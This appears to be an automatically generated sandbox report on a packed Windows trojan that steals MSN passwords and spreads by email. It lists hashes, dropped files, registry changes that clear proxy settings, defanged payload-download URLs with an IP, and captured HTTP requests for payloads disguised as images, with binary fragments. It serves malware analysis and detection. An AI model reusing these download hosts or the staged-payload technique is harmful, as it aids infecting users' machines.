Trojan.Win32.FlyStudio_4761823229

Trojan-PSW.Win32.MSNPassword.FD, Trojan.Win32.FlyStudio.FD, GenericEmailWorm.YR, GenericInjector.YR, TrojanFlyStudio.YR (Lavasoft MAS) Behaviour: Trojan-PSW, Trojan, Worm, EmailWorm The description h...
Blog rating:2 out of5 with1 ratings

Trojan.Win32.FlyStudio_4761823229

by malwarelabrobot on August 25th, 2017 in Malware Descriptions.

Trojan-PSW.Win32.MSNPassword.FD, Trojan.Win32.FlyStudio.FD, GenericEmailWorm.YR, GenericInjector.YR, TrojanFlyStudio.YR (Lavasoft MAS)
Behaviour: Trojan-PSW, Trojan, Worm, EmailWorm


The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

Requires JavaScript enabled!

Summary
Dynamic Analysis
Static Analysis
Network Activity
Map
Strings from Dumps
Removals

MD5: 4761823229e1904d0e1ed24ca58e4145
SHA1: e47ce6137f6c2bc172af48a9deee43c85badecc4
SHA256: ed9cf01731b75a60ecd69de7d4018279d65d881032aa7e4462b9ed9d307e0da9
SSDeep: 24576:2cyu58Q5wrnZxodBmN2W2ImbXZ9ypsAAWvFa/:H58Qyr8pW21bXbytA4g/
Size: 945661 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2017-07-11 19:20:17
Analyzed on: Windows7 SP1 32-bit


Summary:

Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Payload

Behaviour Description
EmailWorm Worm can send e-mails.


Process activity

The Trojan creates the following process(es):
No processes have been created.
The Trojan injects its code into the following process(es):

%original file name%.exe:2972

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process %original file name%.exe:2972 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4ZZNMJGQ\dh[1].jb (606 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\8D93UTC3\goodiedll[1].jpg (313265 bytes)
C:\Users\"%CurrentUserName%"\Desktop\goodie\libuv.dll (200 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\25FDO7QC\goodie[1].jpg (41985 bytes)
C:\Users\"%CurrentUserName%"\Desktop\goodie\msvcr100.dll (773 bytes)
C:\Users\"%CurrentUserName%"\Desktop\goodie\MSVCP100.dll (421 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\8D93UTC3\MSVCP100[1].jpg (62505 bytes)
C:\Users\"%CurrentUserName%"\Desktop\goodie\TheWorld.exe (2 bytes)
C:\Users\"%CurrentUserName%"\Desktop\goodie\lua.dat (1 bytes)
C:\Users\"%CurrentUserName%"\Desktop\goodie\msvcp71.dll (503 bytes)
C:\Users\"%CurrentUserName%"\Desktop\goodie\libtcmalloc.dll (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JYNOWECL\msvcr100[1].jpg (195745 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JYNOWECL\goodiedll2[1].jpg (41681 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4ZZNMJGQ\atl100[1].jpg (28673 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\25FDO7QC\msvcp71[1].jpg (62361 bytes)
C:\Users\"%CurrentUserName%"\Desktop\goodie\ctfmon.exe (136 bytes)
C:\Users\"%CurrentUserName%"\Desktop\goodie\atl100.dll (138 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\25FDO7QC\lua[1].jpg (25 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4ZZNMJGQ\llq[1].jpg (460385 bytes)
C:\speedhack-i386.dll (181 bytes)

Registry activity

The process %original file name%.exe:2972 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Tracing\4761823229e1904d0e1ed24ca58e4145_RASAPI32]
"FileDirectory" = "%windir%\tracing"

[HKLM\SOFTWARE\Microsoft\Tracing\4761823229e1904d0e1ed24ca58e4145_RASMANCS]
"EnableFileTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\4761823229e1904d0e1ed24ca58e4145_RASAPI32]
"EnableFileTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\4761823229e1904d0e1ed24ca58e4145_RASMANCS]
"ConsoleTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\4761823229e1904d0e1ed24ca58e4145_RASAPI32]
"FileTracingMask" = "4294901760"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKLM\SOFTWARE\Microsoft\Tracing\4761823229e1904d0e1ed24ca58e4145_RASAPI32]
"MaxFileSize" = "1048576"

[HKLM\SOFTWARE\Microsoft\Tracing\4761823229e1904d0e1ed24ca58e4145_RASMANCS]
"FileDirectory" = "%windir%\tracing"
"FileTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\4761823229e1904d0e1ed24ca58e4145_RASAPI32]
"ConsoleTracingMask" = "4294901760"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 3C 00 00 00 09 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Tracing\4761823229e1904d0e1ed24ca58e4145_RASAPI32]
"EnableConsoleTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\4761823229e1904d0e1ed24ca58e4145_RASMANCS]
"MaxFileSize" = "1048576"
"EnableConsoleTracing" = "0"

[HKCU\Software\Microsoft\Multimedia\DrawDib]
"vga.drv 1276x846x32(BGR 0)" = "31,31,31,31"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
"AutoConfigURL"

Dropped PE files

MD5 File path
bc83108b18756547013ed443b8cdb31b c:\Users\"%CurrentUserName%"\Desktop\goodie\MSVCP100.dll
1744ed2b5b02680ca7d04efb58a667cb c:\Users\"%CurrentUserName%"\Desktop\goodie\TheWorld.exe
c85670ab64068f8080998aeba6c5019c c:\Users\"%CurrentUserName%"\Desktop\goodie\atl100.dll
419485f745b1fe86a46ba23a3aeab8ab c:\Users\"%CurrentUserName%"\Desktop\goodie\ctfmon.exe
4dbee23a17014f781ba08c83d5ed2b60 c:\Users\"%CurrentUserName%"\Desktop\goodie\libtcmalloc.dll
2836816a275b5cae7e2712275fa8218c c:\Users\"%CurrentUserName%"\Desktop\goodie\libuv.dll
a94dc60a90efd7a35c36d971e3ee7470 c:\Users\"%CurrentUserName%"\Desktop\goodie\msvcp71.dll
0e37fbfa79d349d672456923ec5fbbe3 c:\Users\"%CurrentUserName%"\Desktop\goodie\msvcr100.dll
f581898b2ff51c2ccca11993b693c628 c:\speedhack-i386.dll

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

Company Name: ???????
Product Name: ??????
Product Version: 1.0.0.0
Legal Copyright: ????????

????
Legal Trademarks:
Original Filename:
Internal Name:
File Version: 1.0.0.0
File Description: ??????
Comments: ???????? ????
Language: English (United States)

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
UPX0 4096 1536000 0 0 d41d8cd98f00b204e9800998ecf8427e
UPX1 1540096 831488 830976 5.49457 30069d5f173fa36bf88f54db28ec47d4
.rsrc 2371584 20480 16896 3.85082 440799c448ed5e73e3969b01b0fac369

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs

URL IP
hxxp://dh-down.oss-cn-hangzhou.aliyuncs.com/dh.jb
hxxp://dh-down.oss-cn-hangzhou.aliyuncs.com/dat/msvcp71.jpg
hxxp://dh-down.oss-cn-hangzhou.aliyuncs.com/dat/MSVCP100.jpg
hxxp://dh-down.oss-cn-hangzhou.aliyuncs.com/dat/msvcr100.jpg
hxxp://dh-down.oss-cn-hangzhou.aliyuncs.com/dat/atl100.jpg
hxxp://dh-down.oss-cn-hangzhou.aliyuncs.com/dat/goodie.jpg
hxxp://dh-down.oss-cn-hangzhou.aliyuncs.com/dat/goodiedll.jpg
hxxp://dh-down.oss-cn-hangzhou.aliyuncs.com/dat/goodiedll2.jpg
hxxp://dh-down.oss-cn-hangzhou.aliyuncs.com/dat/llq.jpg
hxxp://dh-down.oss-cn-hangzhou.aliyuncs.com/dat/lua.jpg
hxxp://dh-cfg.liuxue789.cn/dh.jb 120.27.176.36
hxxp://dh-cfg.112zm.com/dat/msvcp71.jpg 120.27.176.36
hxxp://dh-cfg.112zm.com/dat/goodie.jpg 120.27.176.36
hxxp://dh-cfg.112zm.com/dat/MSVCP100.jpg 120.27.176.36
hxxp://dh-cfg.112zm.com/dat/goodiedll.jpg 120.27.176.36
hxxp://dh-cfg.112zm.com/dat/goodiedll2.jpg 120.27.176.36
hxxp://dh-cfg.112zm.com/dat/llq.jpg 120.27.176.36
hxxp://dh-cfg.112zm.com/dat/atl100.jpg 120.27.176.36
hxxp://dh-cfg.112zm.com/dat/lua.jpg 120.27.176.36
hxxp://dh-cfg.112zm.com/dat/msvcr100.jpg 120.27.176.36
abcdfdfd.oss-cn-shanghai.aliyuncs.com


IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

Traffic

GET /dat/msvcp71.jpg HTTP/1.1
Referer: hXXp://dh-cfg.112zm.com/dat/msvcp71.jpg
Accept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: dh-cfg.112zm.com
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: AliyunOSS
Date: Thu, 24 Aug 2017 10:08:07 GMT
Content-Type: application/x-www-form-urlencoded;charset=utf-8
Content-Length: 133400
Connection: keep-alive
x-oss-request-id: 599EA587355BE80F759E2057
Accept-Ranges: bytes
ETag: "4D0FEAE35C22BDA721499A12106674D4"
Last-Modified: Sun, 02 Oct 2016 03:53:51 GMT
x-oss-object-type: Normal
x-oss-hash-crc64ecma: 7332987965176535418
x-oss-storage-class: Standard
Content-MD5: TQ/q41wivachSZoSEGZ01A==
x-oss-server-time: 1
..>.....x...{`....<.H2...p. ......hP..J"l....!.1$..).......p..\.
....j Z...j..Z.I...#<.. .#..u#..!@.|..;..l.....>.....y.s.}..g.o~
P.......,......F.../y.?..WF.{A.f...,Z..5iw...'.o.#..[V.......i.. .~.2m
....;.\....cG. 0..6x.i.....fi.}........:....x..........f.].|...<...
...-v]..[W <.V.U..i../...V......h.F.(...,.......J%g.......UhJb.....
.%H.^../.<..f>....:I......&].anJ.z3.....0..2.z.N(.L.:_.._.J..u..
..i..t!...4AXz..e.8n..G3...L......_... ...$V.]..5].z..[...z....tH.. W/
..N(.......5....s.......}........}........}.......^b.I..O?].tUeG.^...V
.V...xt......\...G.G.;_..*......r.e....YG.R.9Z.v...............l.e.-q.
......aMN:..1..3....!..<3."@..@7.S....0....)<.t/s.E.B....4......
.....x.*[D......eU..........TRZ#x.{.(H!...q..D.S?k...L.~...m..1.......
..D.*......|mU!.......k........5"./9.....;3.r..G. *`?.P...;.{...0.....
.D...._.. ...@v.....fz.u.p.(h.(..y... G@....6.........)@=fll `..XJN...
z..W... .^....h.(^.FW....y.{I/-..i.I"..m..UP.U] ...#.@:...s.........tC
za..C\I......C8v....C8.0.......p........q...q........@^....q|....k.:.q
.t.5G..6......3..T..2. .'..OO....P.f..N.kp........&@Z....5:.Z~..Y`v...
.....@..j..g.X...<.G..z.56:.'.%..Ut[.\.e....C...S.h....K.(.'.=.:.P;
..../.:]P....i..........E.#k....f...#3!...~..E...Z..T..%......$w*.H..p
......WA..}.P....(....2H..d.q?.....Me.Q....&.AmV.N.fP.*..X..K......D.u
..u..L&..`.J....j..L..u.CM[..D..`.o\..nAx.!..y&0E...x...._.i{....... .
n..t.I.X.j........X.....4..Z!.sW. .a*..?~..>...49.!.D.4...%.#......
.T......1.....Z....a=..6....C......1...eN.6..$.Y(.im..|....X).....
<<< skipped >>>

GET /dat/MSVCP100.jpg HTTP/1.1


Referer: hXXp://dh-cfg.112zm.com/dat/MSVCP100.jpg
Accept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: dh-cfg.112zm.com
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: AliyunOSS
Date: Thu, 24 Aug 2017 10:08:10 GMT
Content-Type: application/x-www-form-urlencoded;charset=utf-8
Content-Length: 135085
Connection: keep-alive
x-oss-request-id: 599EA58A355BE80F759E3264
Accept-Ranges: bytes
ETag: "0155139AD083B4D185688EEB444C92AD"
Last-Modified: Sun, 02 Oct 2016 06:53:06 GMT
x-oss-object-type: Normal
x-oss-hash-crc64ecma: 2332238117699590557
x-oss-storage-class: Standard
Content-MD5: AVUTmtCDtNGFaI7rREySrQ==
x-oss-server-time: 1
..>.Pm..x...}|....<........Q..5.(Q#.......&.!......C.........d.V
i....-Z.....-.A....Z~...R.:..A)D...=wfwg&..Z.......73.....{.....2..i..
h......q........M.7....s...=..T.......8.....0.^......r;..8.<....:s'
.:.]T]s..A1I*.............-{.......{........7.l._Y..{..u.^.]...1.n..wv
....D.>......%.......".....eq ....a.M1.....6 q.G.....q.E`.Q..L\..\.
o..Uj.* .g.X"..^......._......FS...uDk. .r..pM.r.Y.W...%..&.n6..2...L.
..Fp..y...De5.i..7.......O...=...,::..rS.....gep*u...C.}SC..E l)U..M.5
.j...OQ........M...$..|...............,....p.1...h..@.....4..@.0.h<
.(.........@"p..........X.....A`..s.%.U`/........8.p.Gsv ...H.f....X.4
.?...^......._.Q...H.F...j`!...Q.6....;...p...v.4..OP&..h.v.........8.
8.h..X...N..'P.... ...O..@...z..g.....@!P.T......~.l.^.d .....C.:.v.O.
..&....*..@.....x...h.s.....'.y`.P.T...N..<N....Q.r./..;.#...9`...0
.X.l............/.W.?.CW.B*0.X.4.......[..U.......'...8.?........~....
....y.J ....._.m@..-p.j^.!.....0#.@9.e.B..^.. ...s.1....@.lv..Z..;.k..
.z....{_......>.v.O.4..#.......pq...%,...D.}.'w.........;X.....~<
;..`.Y...?..-..x....c.....2.{,.p........W3...f..............L.......?.
B....mA.zm.?yJ......{..;(OJ6}..t=6*v5...?.p.}7.m....l.[.....g...3q.-..
...K.{.\>~C...UU...K.yRN.r7..PWn.[:.f.......m|..I....y......d..-...
}2...E..~|U...<m.b...;..o..S...`{.Z..%..?.....x...O.......o. ..'P./
*..t...t.T..9.*4.......y..s...-...`... T..g.[.....4...~...\........u..
e.9<..Z\........7{A}.lv]...$(......w.....,B.......{,B.T.z..,..*.j\u
.E8~."<.f..`.[......W...e.(`,hF..q..k<.....O.8."|....B..a.U.
<<< skipped >>>

GET /dat/msvcr100.jpg HTTP/1.1


Referer: hXXp://dh-cfg.112zm.com/dat/msvcr100.jpg
Accept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: dh-cfg.112zm.com
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: AliyunOSS
Date: Thu, 24 Aug 2017 10:08:11 GMT
Content-Type: application/x-www-form-urlencoded;charset=utf-8
Content-Length: 413371
Connection: keep-alive
x-oss-request-id: 599EA58B355BE80F759E3FFA
Accept-Ranges: bytes
ETag: "3AB3D77C12DC2F5323C23BCA32785D98"
Last-Modified: Sun, 02 Oct 2016 06:53:14 GMT
x-oss-object-type: Normal
x-oss-hash-crc64ecma: 12289816532371195820
x-oss-storage-class: Standard
Content-MD5: OrPXfBLcL1MjwjvKMnhdmA==
x-oss-server-time: 1
..>.P...x...w|O......ye... .(B..Mk.Z....$.W.j...H......]..6!.*....D
lj..=. .......~......u^.\.:.y^.\'.i.=^4....&.F..|...n"{.u.e....k.V..w.
.......?.o.g?...P.g..........&m;z......-..WF......~R....~5n.{...{...4.
.w.q ..[..y..7....;......i\F..H;...`..r..5.i..Rt......I.....HnW.e....Q
D<...>Y<.......9.iz.\..sqq..O.IV..4=..B..E".9\...3.U.h.Ul....
G:.U.Z.L,.*o.M..4._l#..O..........s..W(wz......S.....v.........B>..
P9<"....{..( ...|*.......'.......|...V....._....0....;p.W..f.W.....
V......p..p.....U..4..>. ..............=...'.5&\...`.&a>6.(.....
Dy......q......q....\.....&..`.D.fb!......t..(.....0.....p..a.r..(..h.
...I......8..p).*%..Z..F.C..Bl..\..!n...h.V..w0..b6..&..Q\.m..u...Bu4B
..F..G<.a......1.......tB F`:.a....n..$..D]tG..b:.b....\.......;.).
>..NH..:.v.viy.<....e.....?wN...es/..s.>......Z..[[K...t.....
.I.<.\..HJ.......o.....<..]6...........}.....s.y.[y.............
z.o....k...Q..O.`btL....?....O'O.........../g.5g..../X.h....,.v...._..
..k..[.a....[.&n..c...{..........t.....'.8y.......r..._/'.\I.z.....n..
......>.....i...n.N6g.W.l..=r...;O.|...,T.H.b..K..*U.L.r. T.T..*U.y
W..z.7j..S.^..>~}...........A!.a..#..C...>.G.^.}....wG..........
.......7i..y..o...u....w...s.........>..D..l....{.T.}....3...[}..g3
....O.o}....O..{.[....?...>....(..........=....xF..........IPx@?{h.
pO..7`P.}.4...g...q......0( ...o.'..z.^40..o._P._.`.i.....7(...j...O..
.......<.....38!4..Q..".......[..o.:..W.....p.s.....!.aAa......B.{.
............<.3. {F........!C.........u........vO..?`H.wm......
<<< skipped >>>

GET /dat/atl100.jpg HTTP/1.1


Referer: hXXp://dh-cfg.112zm.com/dat/atl100.jpg
Accept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: dh-cfg.112zm.com
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: AliyunOSS
Date: Thu, 24 Aug 2017 10:08:16 GMT
Content-Type: application/x-www-form-urlencoded;charset=utf-8
Content-Length: 68910
Connection: keep-alive
x-oss-request-id: 599EA590355BE80F759E651A
Accept-Ranges: bytes
ETag: "810F1E656D733FE397B36894B919ADC8"
Last-Modified: Sun, 02 Oct 2016 06:53:19 GMT
x-oss-object-type: Normal
x-oss-hash-crc64ecma: 1513477634852392430
x-oss-storage-class: Standard
Content-MD5: gQ8eZW1zP OXs2iUuRmtyA==
x-oss-server-time: 1
..>.H...x....|S..8~..m..I..*U.". V.H.` ..m1m ...J..XJm......q\/qn..
m....7..6.:..`K."*.*..c...f..qt..9..I....}?.....Ozr......<.9..O.o..
K.8N..(....O..... ..?.q.R....)zs....FS}..;.*...T....MwT...:SM.i.mv..u.
U....5Q..?\....$G...z..Gx.......V.....x..LvdR..q...8..s..|...5k.._..6 
..i...}_...z..'............Fp....'..!w..%q..R..>....J~...y,...<.
c.....d.[.].M.......:Q...^....nb...M.....y.^..@!....?.p...O..<<&
lt;.nS..m...1Ak.WV...>...},<.....r.............r..ty...j.A..&.6.
..:,...i....?...=h..p......8...............~..2.....p....n.M...<..4
.....|.0.....7. ..z.[.......l.x....E.c.....t@.....f.........x.`..^...}
.!....6...9.........p.l.x............_...0. ..........!.'...~.p....I..
.d......X.....Z_......vO...=.....px..6O...=J.vO....S....]<.....q0..
......<....sU\.W....vn...xn.W.5@8Ga...pV.X.[...R..[.....|.-.<k.|
...2.."...W....k(..... \....z...:H_EyL.VAy.....S.5.i...E..p.C.z...R ^^
......{-<..a.........j9...P....gI.[`.;...........uA.'.........m.t..
.........`%@!.....&.#.`:...1....fy...Z..........r.....p..5.XX..h..A...
S....G..<ra.'...w:......y...\..@%...v .i./..c..yn.h.e....n.h#..]...
a|..6.$.|..WB..>W..y..XqW.g=.....8.s.\...s.............n........b._
U..6T.ET.M.pf.zn:.k.28...o.....rA.......[=N.;...r..P..~x..l..'._-.q.Nx
....BK6<..9e..W4......=>.....;.......[a...s.V..aw.:...T}.h..{A.{
>|.n ..r...0?.3.._....%qi.c..o1....S...).\..S....9...Azk\y....p....
.R...0X!|....D.]......_...q1.].-.tc@.K....~..>..{!E</e..U.....b.
..8.....@^[...b.Q....._ .[|8~../..><.....xe=Gm/.n.....Oj.<
<<< skipped >>>

GET /dat/goodie.jpg HTTP/1.1


Referer: hXXp://dh-cfg.112zm.com/dat/goodie.jpg
Accept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: dh-cfg.112zm.com
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: AliyunOSS
Date: Thu, 24 Aug 2017 10:08:19 GMT
Content-Type: application/x-www-form-urlencoded;charset=utf-8
Content-Length: 90154
Connection: keep-alive
x-oss-request-id: 599EA593355BE80F759E77A2
Accept-Ranges: bytes
ETag: "EA6A184865540E95C80955AB8089C483"
Last-Modified: Sun, 02 Oct 2016 07:18:25 GMT
x-oss-object-type: Normal
x-oss-hash-crc64ecma: 18096788365379136236
x-oss-storage-class: Standard
Content-MD5: 6moYSGVUDpXICVWrgInEgw==
x-oss-server-time: 1
..>.....x....|T..0|.O..,......(A.AE.4.....i!.qeC..|*.n..p.hK"q...p[
.V..S..jZ[}[j....%t7...<..5......A.....9g.n6.j....}..E3{..9s...3g..
.[~...A..#... ....K....nt.`..._.c..m..W....}.}..W.....C..<.........
...,.6......_r.7...>...q...4..wt.\........n.X......o....w.. ..}<
q.J..~.tJ.~.......6.%..o|..........)..{......M..-..t.B.....q..^.......
.~N.......[5...^.2..........G...j...7....u...TT'..;.......af..8V.:_...
.Zb........|.Py...m..n........j.!...y...M..> >./E..S.o.....&-.!.
.........En.]U.-x..._..}|.x..V|.26..<..................XoC.Rh.-....
...=....}_.....x.Wz......-N.y.w..j.......?..iI )...... ..l0......{.@v.
...aT.#.1........q.j.4._>...v.... t...Y|.%..=.............5...n....
.K'..JZ(V.\..Zj.BK.B\.Mr?.w..W..{.e:w........n...7*.>v.......*...l&
gt;...!.}W.4..|k.A-..\l..g.n.mI.....r{GX./.K......l..l.Y......s}J.H...
U.l[...en..(.3E}./ )..r...*G.P........;.>.m....,N.}...d.?.......E..
f....b......\..d...v.5.c../.}zW.....X..(..N.g.*.....~O......-`....~.#S
....B.r.$`#.....).K..T.g.N.....X%..PT//.]c..=.e....2e....R....A.#.....
..?` ..cbef&.s..L:.>..q.YC.n...8f.K....1....6..g0)"o..^. .....NC.9v
dR.&.cG.g.?.2. .........H...vy...{.5.}'....lag&.....t"{..< 7f....$.
.Pu.2.1......{r..*<D.^Z:.e..W7.CL...u..~.....J..cPa.s.......Q....v.
.]...T.....y.*P....K......@..Lx..X..e. ....cb..a.O.}..T}l`. .U~a..c...
p..~AUJ...,....&.M:..B.AV."o....m....$5b.}.../..v..m.t...@:.o@....H4:.
j...L.R....k........:E...G.._.w.D.1.>..1..X.IUU[o>L..W.i,.......
.....>.....j:.K......._T..'Y......O..(..aR?.ux..m.....zr..._..c
<<< skipped >>>

GET /dat/goodiedll.jpg HTTP/1.1


Referer: hXXp://dh-cfg.112zm.com/dat/goodiedll.jpg
Accept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: dh-cfg.112zm.com
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: AliyunOSS
Date: Thu, 24 Aug 2017 10:08:23 GMT
Content-Type: application/x-www-form-urlencoded;charset=utf-8
Content-Length: 657304
Connection: keep-alive
x-oss-request-id: 599EA597355BE80F759E9896
Accept-Ranges: bytes
ETag: "802F610E7191F8162A4EFB280373C16A"
Last-Modified: Thu, 24 Aug 2017 06:28:53 GMT
x-oss-object-type: Normal
x-oss-hash-crc64ecma: 12372140137919244439
x-oss-storage-class: Standard
Content-MD5: gC9hDnGR BYqTvsoA3PBag==
x-oss-server-time: 1
..>.. ..x....\.U.8..0...3&.)*.X...V*X....6......../3.n...(........e
....n/.V &....F ..[...$....9......g0..........0.....s.........."$I2.'.
.....K.~... I.G.._z.......?.pV.m .......7..p.MK...J.yQ.......&d...p...
..../..`<6..Pk......._V|....?.8...). ...].nde..xp........L...T....R
.T<...S. `]....uT...HK'......|..MN.$e."..... ?k.._...%I.}.@.{6.....
W....m..........$.9...My._.|}%....WZ.|.j..lEa.L.(%U.C....0.{.7..h....n
........4.h.Y..&.M.......6.o..t.../&.x~4...."...\... W....V.YZ......[.
h..P.|...@J..n].)...............o.~.....................g.....z..="..@
.........R[....D..tW..........#R......yK...,..d..U...X.......U_...'..|
".........5.8..N..u.'.dp_.s.5...&N6...C..."..<u&.NS...!.ah..v.... .
.8..wN.._...a........`.....v/....3v>..Vt.A....%Z.J.<.L^.i.......
K/..B...L(....T.9N;K.....$..e5l..4...@...{...k%.. ...?...V...;#k.zU...
..-.|.j2n......S........-.)..2..'.B_...]f._.V&.........Pj..{.5..."x...
..HN..&..LO.aW.<..^....}: .O..X /..9$....7.I..R!..;..5.J...a.Q[O...
..vY... k]...}.....9.6....H..}..d0T.(.|..]\y....$.."|I....C..@b}.o....
g..4.E..K....}i....id..m&.=.M9ty ..kp..F{.L.....i...c.......f....J..c[
..GwGKs....Jf.;-./..dd....uI..-..j.v. ..^.%....r...&...u<...84...|P
(.6..b...RDyy..(:..a4...B0..tU.;.....|.$..V..............U.....J..B%..
1..o.p..q.S........S..K...~^..\...K..k.:Nu=,x.x.h3...,....[..Ff;{dR*..
eJ.CP....)......? ...^G....`.Z..^...~...........9......c.....f.K.a.O..
6.].9.i...r.B:...{k.....hw.3.(........B(... Vh{.U..b;..u.....nQ...\4..
.w.{.t.....9Z.. ..m"E-..Cr.f~_)..M ........w...s.........c.9..2)X.
<<< skipped >>>

GET /dat/goodiedll2.jpg HTTP/1.1


Referer: hXXp://dh-cfg.112zm.com/dat/goodiedll2.jpg
Accept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: dh-cfg.112zm.com
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: AliyunOSS
Date: Thu, 24 Aug 2017 10:08:30 GMT
Content-Type: application/x-www-form-urlencoded;charset=utf-8
Content-Length: 86887
Connection: keep-alive
x-oss-request-id: 599EA59E355BE80F759ECA26
Accept-Ranges: bytes
ETag: "EFA54AE54CCDA560CBED56B8C7A4FF0D"
Last-Modified: Thu, 24 Aug 2017 06:29:06 GMT
x-oss-object-type: Normal
x-oss-hash-crc64ecma: 1785810222258754547
x-oss-storage-class: Standard
Content-MD5: 76VK5UzNpWDL7Va4x6T/DQ==
x-oss-server-time: 1
..>.....x....|T..8~..d...H.Q..X..1.P D.dC..&!.bHPy4.>(..k..nV.\V
.Uk...*>Z...ZT*.......A...:.F\$..C....{wg........?....s..9s..3....w
..... .z... ..._..=.4.0..W.....5z.f.[..W..6c.......;3..z.]w;2n[..F. ..
.2...g.y.......Z........k}..o..........(m.s..o........E4...M.v_..5..\z
.R..]{Gs.G..D..n_^...k..*..5.B.../S.:....i.!......I{.`._.^.i...&...`.3
8.....].C.x.........B ..e@'<..G.^...>....:'...=.........0.:4!...
.A.e....:n.....SX-.<.....I.L.n.{.@Cl.;G.y'.Y.f9.i[.....b.r'.Yy...x.
...3|...Y.....~........~........~............n...-.g.NU.d..4BS..nI....
m.......I..9.g1h...$..Fp..C9....w._.....ap`..d...;..e.]Wm...... ...._.
......'..K.WC..... ..d.3...#...=V. $.......H].g...O?.~<...D...\f'..
W.....@Y....aii......Z.....s....u.3>.1Q.....]S.]..'-.........L.'n.&
84.>W.8 ..y:\.....YZ.zI;]#N..uX......<...@..gj.a.i.~.NLv6.....O.
......C.X....)..YP.?.`?=...../....}......h......Z.C.x.Oz.\...0.kf.y...
